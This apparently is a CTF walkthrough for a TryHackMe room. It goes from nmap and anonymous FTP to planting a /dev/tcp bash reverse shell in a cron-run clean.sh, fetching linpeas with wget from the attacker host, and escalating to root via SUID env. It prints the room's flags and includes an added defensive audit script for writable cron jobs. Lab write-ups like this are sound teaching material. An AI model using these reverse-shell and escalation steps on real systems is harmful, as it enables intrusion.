A quite minimalistic CTF from tryhackme.com – let's dive right in:
What does nmap say?
sudo nmap -sV 10.10.51.126
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_nmap.png?fit=1020%2C273&ssl=1)
There we have the first answers to the challenge: 4 services are running, FTP on port 21 and SMB on ports 139 and 445.
Now we need to look at the smb shares:
smbclient -L 10.10.51.126
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_smbclinet-l.png?fit=1020%2C170&ssl=1)
Next answer: the share we are looking for is pics.
Now we are looking for the flags.
Let’s see what ftp can do for us.
ftp 10.10.51.126
Anonymous login works.
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_ftp-anonymous.png?fit=1020%2C409&ssl=1)
That looks good: 3 files, we can read all of them and write to the shell script. Let's download them and have a look.
get clean.sh
get removed_files.log
get to_do.txt
to_do.txt only tells us that the admin is planning to block anonymous access. Good idea, but it doesn't help us.
So let’s cat out removed_files.log
cat removed_files.log
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_cat-log.png?fit=1020%2C223&ssl=1)
Not too interesting either.
Let’s move on to the bash script.
cat clean.sh
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_cat-clean-sh.png?fit=1020%2C216&ssl=1)
Now things are beginning to make sense.
clean.sh writes into removed_files.log. Given the large number of lines in the log file, we can assume that clean.sh is called automatically and periodically by a cron job.
We also know that we can write to the file. So let's just plant a reverse shell into that script, set up netcat on our side and see if we get a shell when the cron job eventually fires on the target.
#!/bin/bash
exec 5<>/dev/tcp/10.11.30.88/1234
cat <&5 | while read line; do $line 2>&5 >&5; done
And in our FTP session:
put clean.sh clean.sh
On our local machine we start our usual netcat listener:
nc -l 1234
and wait …
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_nc-connect.png?fit=1020%2C87&ssl=1)
And here we go. Let’s look around.
whoami
pwd
ls -la
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_nc-whoami-pwd-ls-la.png?fit=1020%2C367&ssl=1)
We found the user flag:
90d6f992585815ff991e68748c414740
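The foothold above exists because cron runs clean.sh as root while the anonymous FTP user can overwrite it. The following audit helper is an added example, not part of the original writeup: it walks cron files, extracts the scripts they invoke and reports any that are group- or world-writable. The cron entry and the two sample scripts at the bottom are constructed demo data.

```shell
#!/bin/sh
# Added audit helper (not from the writeup): find scripts that cron runs
# but that other users can modify, the weakness abused via clean.sh above.
# Usage: writable_cron_scripts /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*

# Print every absolute path referenced from the given cron files.
# Comments are stripped; a path may be preceded by schedule fields and a user.
cron_script_paths() {
    for f in "$@"; do
        [ -f "$f" ] || continue
        sed -e 's/#.*//' "$f" | tr -s ' \t' '\n' | grep '^/' || true
    done | sort -u
}

# Report referenced regular files whose group or world write bit is set.
# Output format: "<9-char mode> <path>", e.g. "rwxrwxrwx /opt/clean.sh".
# (Ownership checks, e.g. a root cron job running a user-owned file, are left out.)
writable_cron_scripts() {
    cron_script_paths "$@" | while IFS= read -r path; do
        [ -f "$path" ] || continue              # skip missing targets and directories
        mode=$(ls -ld "$path" | cut -c2-10)     # owner/group/other permission triplets
        group_w=$(printf '%s' "$mode" | cut -c5)
        other_w=$(printf '%s' "$mode" | cut -c8)
        if [ "$group_w" = "w" ] || [ "$other_w" = "w" ]; then
            printf '%s %s\n' "$mode" "$path"
        fi
    done
}

# Constructed demo data: one world-writable script (like the room's clean.sh)
# and one correctly locked-down script, both scheduled from a cron.d-style file.
demo=$(mktemp -d)
printf '#!/bin/bash\nrm -f /tmp/junk\n' > "$demo/clean.sh";  chmod 0777 "$demo/clean.sh"
printf '#!/bin/bash\nlogger rotate\n'  > "$demo/rotate.sh"; chmod 0755 "$demo/rotate.sh"
printf '*/5 * * * * root %s\n0 3 * * * root %s > /dev/null 2>&1\n' \
    "$demo/clean.sh" "$demo/rotate.sh" > "$demo/cleanup"
writable_cron_scripts "$demo/cleanup"   # prints only the clean.sh line
rm -rf "$demo"
```

Run it against the real cron locations as root; any line it prints is a script that a lower-privileged user could turn into exactly the kind of root shell used in this room.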
To get ideas on how to become root let’s use linpeas.
We start a web server locally and pull the file onto the target.
So on our local machine:
python3 -m http.server
And on the target machine:
wget http://10.11.30.88:8000/linpeas.sh
![](https://i0.wp.com/cybersecbits.com/wp-content/uploads/2021/04/anonymous_wget-linpeace.png?fit=1020%2C230&ssl=1)
chmod +x linpeas.sh
./linpeas.sh
In the SUID section we find this line:
-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env
GTFOBins has an entry for exactly this:
https://gtfobins.github.io/gtfobins/env/#suid
From there we use
env /bin/sh -p
and we are root.
whoami
root
cat /root/root.txt
So our root flag is
4d930091c31a622a7ed10f27999af363